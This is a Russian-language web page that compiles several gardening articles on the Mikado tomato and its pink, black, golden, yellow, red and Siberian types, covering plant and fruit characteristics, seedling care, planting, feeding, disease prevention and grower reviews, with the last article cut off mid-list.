0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Разведение томатов микадо

Помидор Микадо: описание сорта, характеристики, особенности выращивания, отзывы

Трудно представить свой рацион без такого овоща, как томат. Он занимает одно из главных мест на праздничных и повседневных столах. Нарезка из свежих помидоров, пикантные и нежные соусы, консервации и множество вкуснейших блюд – все это побуждает овощеводов проводить немало времени на огородах, выращивая очередной урожай.

Существует немалое количество сортов этого овоща, среди которых можно найти и более традиционные, и оригинальные по форме или же окрасу. Каждый выбирает для себя свой любимый вид, ссылаясь на выработанные критерии. Помидор Микадо имеет неоднозначную оценку среди овощеводов. Взвесить все за и против, а также узнать о тонкостях выращивания сорта поможет эта статья.

Общая информация

Кто-то остается верен полученным знаниям и опыту, год за годом выращивая привычные для себя сорта овощей. Другие огородники в поисках новых вкусов и необычных урожаев находят самые оригинальные образцы, выращивая на своих участках уникальные экземпляры. Томат Микадо можно отнести к числу необычных сортов, который одна часть овощеводов хвалит, а другая не перестает акцентировать внимание на его недостатках.

Он был введен во второй половине XX века. Просуществовав уже долгое время, он не теряет лидирующих позиций на рынке и приобретает все больше поклонников среди огородников.

Срок созревания

Помидор Микадо – необычный сорт. Он, словно хамелеон, имеет множество видов, различных по окрасу.

Один из них – розовый. По срокам созревания относится к раннеспелым индетерминантным растениям. Помидоры, готовые к употреблению, можно наблюдать на кустах уже через 95-97 суток после появления всходов из семян. Другие сорта, такие как красный или желтый Микадо, могут похвастать наличием спелых плодов только спустя 110-115 дней. Один куст способен выдержать примерно 7-9 томатов.

Внешний вид куста

Основной стебель достигает длины от 150 до 200 см. Поэтому следует заранее позаботиться о том, чтобы была возможность установить вертикальные опоры и подвязки.

Лист имеет средние размеры и окрашен в темно-зеленый цвет. По внешнему виду напоминает картофельную ботву. Процесс закладывания первого соцветия можно наблюдать на 8 и 9 листах. Следующее через 2–3 листа. Соцветие простое. На одной ветке, как правило, созревает до 8 плодов.

Сорт выращивают в теплицах пленочного и остекленного вида. На территории России его высаживают в открытую почву, получая при этом щедрый урожай.

Плоды

Розовый помидор плоскоокруглый, с плотной мякотью. В среднем томат может весить 300-400 г. Конечно же, при условии, что за растением был должный уход и стояла благоприятная погода. Но подобные показатели не окончательны.

Одним из главных достоинств помидора является его приятный вкус. Мякоть имеет легкий аромат, сладковатая, содержит в себе большое количество полезных веществ, таких как каротин и селен. Опытные овощеводы рекомендуют употреблять урожай помидоров Микадо в свежем виде, но имеются и положительные отзывы касательно консервации томатов такого сорта.

Еще одним достоинством является устойчивость растения ко многим заболеваниям, в особенности к фитофторозу.

Выращивание рассады

Выращивание помидоров Микадо начинается с посева семян. В календаре следует пометить для этих целей конец февраля или начало марта. Перед началом посева необходимо убедиться, что посадочный материал является качественным, и проверить его на всхожесть.

Грунт также проходит обработку. Его обеззараживают с помощью раствора марганцовки. После завершения посева первые всходы следует ожидать примерно через 5-7 дней.

Выращивание должно проходить в комфортных для молодых помидоров условиях: необходимо позаботиться, чтобы рассада не испытывала недостатка в освещении, а также поддерживать температуру 16–22 ºС.

Первую пересадку, или, как ее еще называют – пикировку, проводят не раньше, чем на всходах появится 2-3 полноценных, настоящих листа. Подобная процедура помогает улучшить рост корневой системы молодых томатов.

Как и многие другие культуры, помидоры в процессе роста необходимо подкармливать. Для этого отлично подойдут комплексные удобрения. Первый внос удобрений можно проводить спустя 10–12 дней с момента перевалки кустов.

Посадка рассады томата Микадо в теплицу или открытый грунт возможна только при условии, что земля успела хорошо прогреться как минимум до 16 ºС, а в ночное время столбик термометра не будет опускаться до низких или тем более отрицательных отметок.

Сильная, хорошая рассада должна быть не моложе 50-60 дней. Это оптимальный возраст для молодых помидоров.

Высадка рассады

Для пересадки окрепшей рассады на постоянное место подойдет далеко не любой день. Наиболее комфортно помидоры будут чувствовать себя при хмурой и пасмурной погоде. Также не стоит заниматься таким ответственным делом с утра. Лучше, если это будет послеобеденное время или вечер. Так вы сможете создать наиболее комфортные условия для нежной рассады, ее адаптация к новому месту пройдет без особых сложностей, и урожайность томатов Микадо будет на высоте.

Важно помнить, что куст достигает внушительных размеров, а потому нуждается не только в хорошей опоре, но и в достаточном количестве свободного пространства. Лунка должна быть большой, примерно 50х50 сантиметров.

Чтобы куст свободно тянулся ввысь, необходимо своевременно установить опоры. Для этого чаще всего используют деревянный шест, высота которого составляет не менее 4 м.

Грунт перед посадкой следует тщательно удобрить навозом, компостом или перегноем. Нелишним будет добавление фосфора или золы.

Между самими кустами также следует оставить больше места, поскольку раскидистые ветви одного экземпляра могут затенять другой и ухудшать его рост.

Выбор места для посадки

Характеристика помидора сорта Микадо, несомненно, важна, однако описанные выше плоды невозможно получить, если не уделить достаточно внимания месту, где будут посажены кусты растения.

Томаты очень резко реагируют на уровень освещения. Высаживать рассаду следует только в местах, где много солнечного света. Если кусты будет покрывать тень, то ждать щедрый урожай не стоит.

Почва, на которой планируется выращивание культуры, должна быть плодородной и иметь подходящий физический состав. Микадо любит суглинистый рыхлый или супесчаный грунт.

Важно периодически вносить органические удобрения. Выбор подкормки также имеет значение. Фосфорные и калийные составы стимулируют рост и ускоряют созревание плодов, тогда как азотные удобрения могут замедлить эти процессы.

Уход за растением

Для многих овощеводов данный этап является наиболее сложным, поскольку выращивание розовых помидоров этого сорта требует немало времени и усилий.

После высадки рассады необходимо дать ей несколько дней, чтобы окончательно адаптироваться. Затем следует прорыхлить землю вокруг кустов, облегчая доступ кислороду к корням. Периодически растения окучивают.

Процедуру рыхления повторяют три раза за время созревания плодов. Параллельно участок очищают от сорняков.

Необходимо следить за почвой: как только она начинает высыхать, следует полить кусты. Поить томаты слишком часто не стоит, достаточно не скупиться и давать растению большое количество влаги.

Отзывы

Огородники не имеют единого мнения о розовом помидоре Микадо. Отзывы о нем расходятся, когда речь заходит об уходе. Часть овощеводов утверждают, что растение слишком капризное и забота о нем часто не приносит желаемых результатов. Другие огородники уверены, что все дело в желании посвящать уходу достаточно времени, и тогда старания вознаградятся щедрым урожаем.

На результат может повлиять множество факторов: качество семян и рассады, выбранное место, плодородность почвы и погода.

Помидоры Микадо – необычный сорт с прекрасными вкусовыми характеристиками, ради которых стоит потрудиться. Вырастить хороший урожай под силу даже новичку, при условии, что он ответственно подойдет к делу.

В благодарность за труды вы сможете долгое время наслаждаться крупными и сочными плодами томата.

Томаты «Микадо»: розовый, черный, золотой, желтый и красный

Общая информация

В последнее время бесконтрольность на рынке семян привела к появлению новых сортов и гибридов, которые могут быть и не новы и не урожайны, но фасуются под знаменитые сорта.

Если раньше овощеводы чётко знали, что микадо — это крупный розовый помидор, то на сегодняшний день информация размыта и запутана.

Единственно верно то, что «Микадо розовый», а не «розовый микадо» это единственно законный сорт. Вполне возможно, что другие, уже «гуляющие» по огородам микады, также пройдут испытания и через некоторое время регистрационная комиссия примет их в реестр селекционных достижений. В реестр селекционных достижений Украины сорт не введён.

Пока этого не случилось, будем обходиться тем, что предлагают нам фасовщики семян.

«Микадо розовый»

Заявитель и оригинатор сорта ООО «Селекционная фирма Гавриш» г. Москва Россия. Сорт был принят на испытание в 2013 году, а в 2015 году регистрационная комиссия внесла сорт в реестр под номером 8653901.

Характеристика и описание

Томат этого сорта имеет салатное предназначение. Его плоды насколько крупные, что уже из одного помидора можно сделать блюдо на всю семью.

Растение индетерминантное, высокорослое. Высота главного побега варьирует в пределах 160—180 см.

Листовая пластина не крупная, среднего размера и ничто не мешает подам «купаться» в лучах солнца. Лист по цвету тёмно-зелёный. Соцветие «Микадо розового» простое.

Плод крупный и очень крупный. Средний вес от 350 до 400 г. Те, кто выращивал этот сорт делясь впечатлениями, описывают, что помидоры весом 700-800 г абсолютная реальность. Однако особенностью сорта есть то, что самые крупные томаты образовываются на нижних соцветиях, а подымаясь выше, томаты становятся меньше.

По окраске плоды в период дозревания светло-зелёного цвета с ярко выраженными тёмно-зелёными пятнами у основания плодоножки. Постепенное созревание делает зелень менее интенсивной и к моменту полной зрелости помидоры становятся полностью розового цвета. О цвете нельзя сказать что он интенсивный и однородный, а скорее тускло-розовый.

Сорт «Микадо розовый» овощеводы сравнивают с сортом «Чудо земли». Внешне разница только в том, что «Микадо» чуть более плосковат по форме. Однако при дегустации становится понятно, что никакое «чудо» не может сравниться со вкусом плодов «Микадо розового». По запаху оба сорта очень ароматные.

Дегустационная комиссия, оценивая сорт, поставила оценку «отлично». Овощеводы считают, что сорт по праву её заслужил. Многие отмечают, что из десятка сортов, которые растут на грядках, этот томат имеет наилучший вкус. Баланс сахаров и органических кислот настолько подобран, что томат кажется удивительно помидорным и вкусным.

Устойчивость к болезням и вредителям

Поскольку томат предназначен для теплиц, то, казалось бы, нет повода для особого беспокойства. Однако отзывы овощеводов не так оптимистичны.

Достоинства и недостатки

Среди достоинств сорта можно отметить:

  • Крупноплодность;
  • Отличный вкус свежих плодов;
  • Прекрасную консистенцию и вкус томатных продуктов.

Недостатком сорта можно считать:

  • низкую урожайность;
  • некоторые томаты растрескиваются у плодоножки.

Особенности выращивания сорта

Урожайность сорта варьирует в пределах 5,0-6,0 кг с метра квадратного. Учитывая, что на метр можно высадить не более трёх растений, то каждое может дать в пределах 2-х кг.

Однако овощеводы, которые из года в год выращивают сорт, утверждают, что сорт даёт более высокую урожайность, но для этого необходимо:

  • Ведение растения в один побег;
  • Поддержание высокой питательности грунта;
  • Своевременные поливы и подкормки.

«Микадо чёрный»

Томат «Микадо черный» выпустил в свет ТМ «Весна». Считается этот сорт коллекционным, но авторство его неизвестно.

Характеристики и описание

Растение индетерминатное, высота его в пределах 150 см. Выращивать сорт можно как под плёночным укрытием, так и в открытом грунте.

Плоды томата этого сорта более округлые, чем у розового микадо. По цвету плоды коричнево-фиолетовые, крупные, в пределах 250-300 г.

По вкусовым характеристикам томаты сбалансированного, томатного вкуса, приятные, ароматные.

Томат «Микадо черный» характеристика и описание сорта, отзывы, фото, урожайность не имеют много информации, поскольку сорт ещё мало знаком овощеводам.

Устойчивость к болезням и вредителям

Тот, кто уже успел познакомиться с сортом, говорят, что после обработок сорт не поражается более чем растущие по соседству растения.

Достоинства и недостатки

Среди достоинств сорта:

  • необычный цвет;
  • раннеспелость;
  • дружное созревание;
  • интересный вкус.

Недостатком может случить тот показатель, что томат растрескивается у плодоножки.

Особенности выращивания сорта

Особенностью выращивания сорта является формирование его в один побег. Своевременное пасынкование позволит не отвлекать питательные вещества от томатов на рост не нужной вегетативной массы, и тем самым увеличит урожайность.

«Микадо золотой»

Разновидность золотого микадо вышла в свет под покровительством фирмы «Уральский дачник». Кто селекционер и автор сорта остаётся неизвестным. По цвету томаты жёлтые, почему их назвали золотыми пока также остаётся тайной.

Характеристики и описание

Томат «Микадо золотой» отзывы, фото, кто сажал, говорят о том, что это сорт среднего срока созревания и высокорослый.

Плоды этого сорта округлые или слегка плоскоокруглые, при этом одно и то же растение может нести плоды разной формы. Крупность помидора в среднем 300-400 г, некоторые экземпляры доходят до 500 г.

Помидоры золотого микадо мясистые, имеют множество (6-8) семенных камер наполненных не жидкой фракцией, а «телом», а вот количество семян совершенно малое.

По вкусу томаты очень приятные, сбалансированные, с хорошей долей сахаров, но при этом с ощутимым томатным вкусом и послевкусием. Повышенное содержание бета каротина ставит этот сорт в разряд диетического продукта. Такие плоды рекомендуют для детского питания, а так же позволяют потреблять людям, страдающим желудочно-кишечными расстройствами.

Устойчивость к болезням и вредителям

Томаты требуют профилактических обработок от опасных грибковых болезней.

Нет смысла рисковать все растением и вырастив, потерять его. Современные препараты:

Достоинства и недостатки

Сорт этого томата обладает истинными достоинствами:
  • крупноплодность;
  • отличный вкус;
  • прекрасно переносит перепад температур.

Как недостаток можно отметить то, что иногда томаты растрескиваются.

Особенности выращивания сорта

Каждый высокорослый томат требует формирования и подвязывания. Особенностью золотого микадо является и то, что его плоды огромны. Без помощи человека растение не сможет сформировать огромные плоды и тем более удержать их на побегах.

«Микадо жёлтый»

Томат микадо «Желтый» овощеводы сравнивают с солнцем. Его плоды плоскоокруглые и ярко жёлтого цвета.

Характеристики и описание

Получить зрелые плоды этого сорта рано не представится возможным — он среднепоздний.

Растение индеретминантное, высотой до 180 см. Первые плоды закладываются над 78 листом, далее через 2-3. Вес плодов в среднем 200-250 г, однако, встречаются и крупнее до 500 г. Каждая кисть, в которой 3-4 плода несёт в себе очень крупный плод и поменьше. Выравненности плодов нет.

Плоды яркого жёлтого цвета с наружи, но при разрезе помидоры бледно-жёлтые, а местами почти белые. Зелёного пятна у плодоножки томат не имеет. Семенных камер 7-8, заполнены они мякотью с небольшим количеством семян. Плоскоокруглый томат имеет ребристость, на некоторых плодах рёбра делят томат на несколько частей.

Особенностью плода является и то, что сторона обратная плодоножке всегда имеет борозды, что удерживает овощеводов от дальнейшего его выращивания.

Устойчивость к болезням и вредителям

Томат этого сорта имеет среднюю устойчивость к основным грибковым болезням.

Достоинства и недостатки

Среди достоинств сорта можно отметить:
  • отличную лёжкость плодов;
  • крупноплодность;
  • вкусовые качества.

Сорт не лишён недостатков:

  • растрескивание плодов;
  • бороздчатость верхней части томата;
  • бледность окраски внутреннего содержимого.

Особенности выращивания сорта

Томат высокорослый и несёт на себе очень крупные плоды. Без своевременной формировки обойтись растению нельзя. Пасынкование и подвязывание высокорослого растения непременное условие.

Овощеводы, делясь своим мнением, утверждают, что этот сорт очень отзывчив на подкормки.

«Микадо красный»

Томат микадо красный уже опробован многими овощеводами, однако обидно то что единого мнения по сорту нет. Фасовщики и якобы производители под это название фасуют много разных крупноплодных томатов. Если вам удастся стать обладателем вкусного и урожайного сорта, соберите семена и пользуйтесь.

Характеристики и описание

«Микадо красный» индетерминантный, высокорослый сорт. Высота растения может быть выше 200 см. Плоды его крупные до 300 г весом, многие утверждают, что почти каждая гроздь несёт в себе томат до 400 г, а остальные меньшего размера.

Плоды насыщенно красного цвета, плотные, мясистые, с множеством семенных камер. Семян в плодах не большое количество и они расположены в томатной мякоти. Кожица плода упругая, однородная, ярко-красного насыщенного, однородного цвета.

Рассматривая помидоры микадо описание невозможно без дегустационной оценки и она выставляется всеми огородниками на «отлично». Сбалансированный томатный вкус очень напоминает те давние помидоры, вкушая которые получали наслаждение. Сахара и органические кислоты сорта состоят в таком равновесии, что и салатная продукция и продукты переработки радуют овощеводов и потребителей.

Продукты переработки получаются плотными, ароматными, вкусными с отличным насыщенным, красным цветом и малым содержанием семян.

Устойчивость к болезням и вредителям

Многие овощеводы жалуются, что этот сорт не выдерживает повышенной влажности, а вот в теплицах и парниках он ведёт себя прекрасно.

Достоинства и недостатки

Как и каждый сорт микадо красный имеет свои плюсы и минусы. Среди достоинств сорта:

  • долго храниться, не теряя органолептических свойств;
  • крупноплодность;
  • отличные вкусовые качества свежего плода;
  • хороший товарный выход продукции;
  • прекрасные качества в переработке на томатные продукты;
  • высокая урожайность.

Среди недостатков плохая устойчивость к повышенной влажности.

Особенности выращивания сорта

Микадо красный очень требователен к плодородию грунта. По отзывам овощеводов, если два растения посажены недалеко, но одно подкармливать, а другое нет, разница будет настолько велика, что сорт становится неузнаваемым. Без должного ухода теряется крупноплодность и изысканность вкуса, а урожайность падает до минимума.

Хорошая агротехника грунта в месте посадки главное условие получения урожая томатов этого сорта. Следуя технологическим нормам можно получить высокий товарный вал, а для этого:

  • отдайте томатам самые тёплые и светлые грядки;
  • проведите культивацию грунтов;
  • используйте севообороты;
  • проводите своевременное формирование и подвязку;
  • осуществляйте подкормки регулярно и своевременно;
  • не отказывайтесь от профилактических обработок фунгицидными препаратами.

«Микадо сибирико»

Томат этой разновидности микад представлен фирмой «Сибирский сад». Зачастую такие томаты возделываются в зонах рискованного земледелия, где перепады температур и влажности столь высоки, что только особо стойкие сорта могут показать хорошие результаты. Поскольку сорт и создан для сибирских просторов, то отвечает всем требованиям.

Рассматривая сорт Микадо «сибирико» отзывы, фото, урожайность, овощеводы подметили, что сорт очень похож на сорт «Батяня» селекционеров Дедерко В.Н и Постникова О.В.. Этот сорт внесён в реестр селекционных достижений в 2007 году и пользуется законным уважением среди почитателей томатов.

Видео: Все о сорте томата «Микадо желтый»

Характеристика томата сорта Микадо

Томаты – овощ, без которого сложно представить себе современную кулинарию. Летом и осенью его употребляют преимущественно в свежем виде, зимой – консервированные салаты, соленья, круглогодично – соусы, кетчупы, соки. Ценят помидоры за полезные для организма человека свойства и вкусовые качества. Томаты Микадо – один из популярных сортов, который обладает прекрасными потребительскими свойствами и хорошо зарекомендовал себя в регионах с разными климатическими условиями.

Характеристика томата сорта Микадо

Интригующее название сорта имеет японское происхождение. Дословно переводится как «высокие ворота». В древнеяпонской традиции так именовали императора. Есть мнение, что свое название сорт получил по форме помидора, напоминающего императорскую корону.

Характеристика сортов

Томат Микадо, по описанию от фирм производителей, относится к индетерминантным (с неограниченным ростом стебля) сортам. Это среднеспелые томаты, от посадки до созревания первого урожая проходит 110-115 дней. Сорт не является гибридом.

Фактически, существует несколько разновидностей сорта томата Микадо, имеющих общее название, но отличающихся характеристикой плодов, сроками созревания, высотой растения:

  • Микадо розовый;
  • Микадо красный;
  • Микадо желтый;
  • Микадо золотой;
  • Микадо черный;
  • Микадо Сибирико.

Специалисты отмечают, что в Государственный реестр Российской Федерации внесен только Микадо розовый (2015 год). Происхождение других Микадо неизвестно.

Сорт рекомендован для выращивания в пленочных теплицах. Но томат Микадо, по отзывам, показывает прекрасные результаты и при возделывании в открытом грунте, особенно Микадо красный.

Описание куста

Куст томатов Микадо достигает высоты 1,5-2,5 м. Исключение составляет Микадо красный: в открытом грунте кусты имеют высоту 80-100 см. Высокорослые растения нуждаются в опоре и подвязывании. Овощеводы формируют его в 1-2 стебля. Первая кисть закладывается обычно над 9 листом. А затем формируется через каждые 2-3 листочка.

Необходимо пасынковать растение в процессе выращивания, чтобы избежать загущения и получить хороший урожай. При формировании куста в два стебля оставляют один пасынок перед первой цветочной кистью, а все остальные удаляют. Пасынкование проводят примерно один раз в неделю.

Листья представителей этого сорта имеют характерную форму и темно-зеленую окраску, что делает их похожими на картофельные.

Описание плодов

Плод томатов серии Микадо крупный, округлой, приплюснутой формы, немного ребристый. Исключение составляют ягоды Сибирико: они сердцевидные. Вес достигает 250-350 гр. При правильном уходе, формировании куста получают плоды-гиганты весом до 600-800 гр. При неблагоприятных погодных условиях, неправильном поливе овощ может растрескиваться.

Помидоры Микадо – салатные, их ценят за вкусовые качества.

Цвет помидоров серии Микадо разный, информация о нем содержится в названии сорта (плоды Сибирико – красные). Мякоть сочная, упругая, сладковатая. Желтая и оранжевая окраска плода свидетельствует о содержании большого количества бета-каротина. Урожайность сорта – средняя, 6-8 кг. с куста. Производители семян растений рекламируют высокую урожайность Микадо розового и Сибирико.

Плоды ценятся за вкусовые качества

Поскольку сорт крупноплодный, употребляют помидоры, в основном, в свежем виде, для приготовления салатов, закусок, перерабатывают на сок, готовят соусы. Более мелкие плоды используют для приготовления заготовок на зиму целиком.

Особенности ухода

Выращивание томат Микадо происходит через рассаду. Оптимальная температура для развития растений – 20-25 гр. При низких температурах (менее 15 с°) прекращается рост побегов, при высоких (более 35 гр.) – не образуется завязь.

Высадка семян

Посев семян на рассаду производят за 60-65 дней до предполагаемой высадки растений в грунт. Семена обычно специально готовят к посадке. Если они хранились в прохладном месте, то желательно прогреть.

Перед посевом семена обрабатывают. Сначала их в полотняном мешочке опускают в розовый раствор марганцовки на 15-20 минут (нельзя передерживать, чтобы не обжечь). А затем можно замочить на 5 часов в растворе древесной золы (для его приготовления 1 столовую ложку золы заливают 1 л. теплой воды и настаивают в течение суток). Такая обработка не только предотвращает многие заболевания, но и насыщает семена микроэлементами, обеспечивая хорошую всхожесть и энергичный рост.

Для выращивания рассады используют почвенные смеси, приобретенные в специализированных торговых точках, или готовят их сами. При этом учитывают, что для томатов подходят легкие почвы (в состав могут входить торф, перегной, коровяк, песок или опилки). Высевают семена в лотки, специальные кассеты, обеспечивая хороший дренаж.

Уход за рассадой

Для прорастания семян и развития молодых растений необходим солнечный свет, соблюдение температурного режима и своевременный полив. Появление первых ростков происходит на 3-5 день после посадки.

Когда разовьются два настоящих листочка, необходимо провести пикирование, чтобы получить качественную рассаду. Молодые, наиболее крепкие растения пересаживают в отдельные стаканчики, прищипывая при этом центральный корень для образования боковых корешков и усиления корневой системы.

Высадка в грунт

За неделю до высадки рассады в грунт огородники советуют обработать её бордосской жидкостью. Рекомендуют также провести закаливание – выносить на время в прохладное помещение или хорошо проветривать имеющееся. Рассада готова к высадке, если сформировалось 7-8 настоящих листочков.

Лунки следует обработать раствором марганцовки

Варианты размещения могут быть разными:

  • высадка по схеме 50х50 см. (2-3 растения на кв.м.), чтобы обеспечить хорошее проветривание и не потерять урожай вследствие загущения;
  • если томаты будут выращивать в один стебель, то можно расстояние между растениями сократить до 18-20 см., а междурядья сделать шириной 100-120 см.

Непосредственно перед посадкой лунки проливают слабым раствором марганцовки. У молодого растения удаляют несколько нижних листочков, оставляя всего 3-4 хорошо сформированных. В почву заглубляют и часть стебля, оставляя на поверхности только листья.

Чтобы своевременно подвязать растения, необходимо использовать на грядках Т-образные опоры, между которыми протягивают проволоку, или индивидуальные опоры (шесты) для каждого куста.

Полив и внесение удобрений

Полив томатов лучше проводить в вечернее время, не допуская попадания воды на стебель и листья.

Частота полива зависит от погодных условий – 1-2 раза в неделю. В период роста и завязывания плодов полив должен быть обильным, а при созревании урожая – минимальным, чтобы не допустить растрескивания и сохранить вкусовые качества помидоров.

Томаты требовательны к плодородию почвы, поэтому подкормки органическими и минеральными удобрениями должны быть регулярными. Обычно удобрения вносят 3-4 раза в сезон. Первый раз – через 10-12 дней после высадки рассады. Далее рекомендуют повторить перед цветением, с появлением завязи и в период наливания плодов.

Желательно использовать органику, приготовленную самостоятельно:

  • перебродивший настой крапивы (1 ведро крапивы на 3 ведра воды);
  • раствор коровяка (1 ведро навоза на 4 ведра воды сбраживают несколько дней до удаления большей части мочевины);
  • настой куриного помета (берут помет и воду в пропорции 120, перемешивают и оставляют на открытом воздухе на 10 дней).

Кроме того вносят суперфосфат, мочевину, золу. В очень жаркую погоду, чтобы стимулировать образование завязи, кусты обрабатывают борной кислотой из распылителя.

Болезни и вредители

Как утверждает официальное описание томат Микадо устойчив к большинству заболеваний. Наиболее часто поражается фитофторозом. Это грибковая инфекция проявляется обычно в прохладную влажную погоду, легко передается от растения к растению. Поскольку фитофтороз поражает не только зелень, но и плоды, заболевание существенно снижает урожайность. Меры по предупреждению болезни проводят в течение всего периода выращивания.

Для профилактики фитофтороза нужно:

  • высаживать томаты на солнечном месте, где до минимума сведено попадание на растение холодной росы;
  • обеспечить хорошее проветривание грядок;
  • своевременно пропалывать и рыхлить междурядья;
  • полив проводить под корень.

Характеристика паслёна говорит что с профилактической целью посадки томатов систематически обрабатываются бордосской жидкостью еще на стадии рассады. Для борьбы с фитофторой разработано множество фунгицидов. Но огородники рекомендуют использовать домашние средства, которые не имеют побочных эффектов для человека: настой чеснока (200 гр. измельченных зубчиков на литр воды, настаивать 2-3 дня), отвар луковой шелухи. Применяют также раствор перманганата калия, растворы с добавлением зеленки или йода.

Заключение

Описание и отзывы о томате Микадо в основном восторженные. Дачники и огородники отмечают, что помидоры имеют прекрасный вкус. Рекомендуют выращивать разные сорта линейки, но наиболее выгодным считают Микадо розовый (цена розовых помидоров на рынке обычно выше).

Помидор «микадо»: описание сорта, особенности выращивания и ухода, отзывы

Удивительно, что в настоящее время без помидоров не обходится ни один повседневный или праздничный стол. Хозяйки используют этот овощ в свежем виде, делают соусы, добавляют к мясным и рыбным блюдам, заготавливают на зиму. Существует масса самых разных сортов томатов. Одни более сладкие, другие хорошо хранятся, третьи красиво смотрятся в нарезке. В этой статье рассмотрим один из популярных сортов ‒ помидор «микадо». Он отлично зарекомендовал себя в наших условиях и ценится многими за большие и мясистые плоды, а также сладкий вкус.

Описание сорта

Сорт помидор «микадо» отличается высокорослостью и среднепоздним сроком созревания. Вегетационный период длится 135-150 дней. Плоды созревают через 95 дней после посадки. Высота взрослого куста достигает 1,5-2,5 метра в высоту. Листья широкие, темно-зеленые, по внешнему виду напоминают картофельные.

Плоды плоскоокруглые, сочные и мясистые, с плотной кожицей.

Масса томатов достаточно высокая, 400-600 грамм. На одном кусте могут находиться до 8 помидоров. Плоды имеют хорошую сохранность как в домашних условиях, так и при консервировании. Помидор «микадо» может быть красного, розового, желтого и даже черного оттенков. Но все они схожи по вкусовым качествам и технологическим свойствам.

Сорт устойчив ко многим заболеваниям, в том числе и к фитофторозу.

Условия выращивания

Лучшей температурой для роста и развития томатов, а также для формирования высокого урожая, является 20-25 градусов. Если столбик термометра опускается ниже отметки в +16 градусов, то цветение останавливается, прекращается завязывание плодов, а если температура опустится еще ниже, то прекратится и рост растения. Высокая температура также сказывается отрицательно, поскольку не происходит опыления.

Помидор «микадо» очень требователен к свету, высаживать его нужно только в хорошо освещенных, солнечных местах, так как при сильном затемнении значительно падает урожайность.

Также томаты остро реагируют на физический состав и плодородие почвы. Высокий урожай и хороший рост растения возможен на рыхлых суглинистых или супесчаных почвах при регулярном внесении органических удобрений. Однако стоит помнить, что калийные и фосфорные удобрения ускоряют рост и созревание плодов, а чрезмерные подкормки азотом оттягивают созревание.

Высадка рассады

Лучшее время для высаживания рассады помидоров ‒ вечер или хмурый пасмурный день. Это обеспечивает лучшую приживаемость растения. Поскольку помидор «микадо» относится к высокорослым сортам, лунки для рассады делают больше, чем для других сортов томатов, примерно 50×50 сантиметров. В каждую лунку обязательно вставляют шест высотой не ниже 4 метров для подвязывания растения по мере роста. Перед посадкой вносят удобрения: перегной или компост, немного золы и фосфора. Особое внимание следует уделить расстоянию между помидорами, так как при частой посадке кусты могут затенять друг друга.

Уход за томатами

Через пару дней после посадки участок, на котором растут помидоры, рыхлят, а растения окучивают. В дальнейшем трижды за сезон необходимо рыхлить почву, удалять сорняки, окучивать и, если необходимо, подвязывать растение.

Полив проводят по необходимости, по мере высыхания почвы. Более приемлемы редкие, но обильные поливы. Помидор «микадо» чувствителен к сорнякам, поэтому требуется их постоянная прополка.

Мнения о томатах

В различных источниках можно найти множество отзывов на помидоры «микадо». Отзывы в большинстве своем носят положительный характер. Садоводы отмечают высокий урожай, отличные вкусовые качества, хорошую всхожесть семян. Из недостатков иногда называют тот факт, что томаты могут менять свой вкус при засолке, поскольку мякоть их очень нежная. Именно поэтому употреблять «микадо» лучше всего в свежем виде. Красные помидоры хорошо подходят для приготовления борща и томатной пасты, а розовые ‒ для свежих салатов.

Розовый «микадо»

Помимо красных томатов, существуют и другие помидоры «микадо». Розовый, например, очень раннеспелый. От момента появления всходов до периода плодоношения проходит около 90-94 дней. Этот сорт отлично подходит для пленочных и остекленных теплиц, является индетерминатным, то есть имеет неограниченный рост. Помидоры «микадо» (розовый сорт) отличаются округлыми, слегка плоскими плодами, одноразмерными и одинаковыми по форме. Масса помидоров достигает 400-500 граммов. Мякоть сочная, сладкая, содержит в своем составе много ликопина, каротина и селена. Плоды замечательно подходят и для приготовления салатов, и для консервирования на зиму.

Сорт устойчив к основным заболеваниям. Посев на рассаду осуществляют в конце зимы ‒ начале весны, в это же время рекомендуется дополнительное подсвечивание. После посадки растений в теплицу (в конце апреля) следует обязательно подвязать томаты.

Формировать растение в один стебель нужно путем удаления всех нижних листьев и пасынков, а также прищипывая точку роста.

Итак, в статье были рассмотрены помидоры «микадо». Фото показывают, что плоды этих томатов имеют большой размер, а отзывы садоводов говорят об их невероятном вкусе и сочной упругой мякоти. Однако следует знать, что наилучшими вкусовыми качествами обладают те помидоры, которые сняты в конце полной зрелости. Они же идеальны и для приготовления сока, консервов, томатной пасты. Для соления и маринования можно использовать зеленые или бланшевые плоды, если они не успели полностью дозреть до наступления первых заморозков.

Сорт томата «Микадо»: описание, характеристика, посев на рассаду, подкормка, урожайность, фото, видео и самые распространенные болезни томатов

С наступлением дачного сезона огородники начинают хлопотать на своем приусадебном участке. Перед большинством всегда стоит дилемма: какому томатному сорту отдать предпочтение. Томаты должны быть урожайны, с хорошим иммунитетом, иметь возможность выращивания как в теплице, так и в открытом грунте. Именно такими характеристиками обладает томатный сорт «Микадо».

Сорт томата «Микадо» желтый:

Происхождение сорта помидоров «Микадо»

Информация по достоверному происхождению сорта разнится. По одним источникам, прародителем томата считают сорт ShahMikado, который появился в Америке в ХIХ веке. Однако в некоторых энциклопедиях утверждается, что «Микадо» появился на Сахалине в 1974 году.

Описание сорта: желтый, черный, красный и розовый

Плоды:

  • Кругло-плоской и ребристой формы, немного заостренной внизу;
  • Имеет довольно тонкую, не жесткую кожицу;
  • Сочная мякоть содержит большое количество сахара;
  • В основном розовой окраски, однако бывают красные, желтые и черные разновидности;
  • Количество камер 3-4;
  • Содержание сухих веществ от 4 до 5%;
  • Средняя масса 250-300 грамм.

Кусты:

  • Штамбовые, полудетерминантного типа, вырастают до одного метра;
  • Широкие листья темно-зеленой окраски, формой слегка напоминающие картофельные;
  • Закладка первой кисти происходит над 9 листком, последующих через каждые 2-3 листка.

Помидоры: достоинства и недостатки

Томат «Микадо» выгодно отличается от остальных сортов:

  • Прекрасными вкусовыми характеристиками;
  • Высоким содержанием сахара;
  • Хорошим товарным видом плодов;
  • Отличной лежкостью;
  • Устойчивостью к большинству заболеваний.

К недостаткам относят:

  1. Необходимость обязательного пасынкования;
  2. Невысокую урожайность;
  3. Требовательность к вносимым удобрениям и режиму поливов.

Применение плодов

Томат «Микадо» идеален для употребления в свежем виде. Плоды также используют для производства вкусного томатного сока и густой пасты.

Выращивание помидоров

Выращивают сорт рассадным способом.

Как подготовить семена?

Основные правила подготовки семенного материала:

  • При хранении семян в прохладном месте их необходимо прогреть;
  • Семена в полотняном мешочке помещают в слабый марганцовый раствор на 15-20 минут;
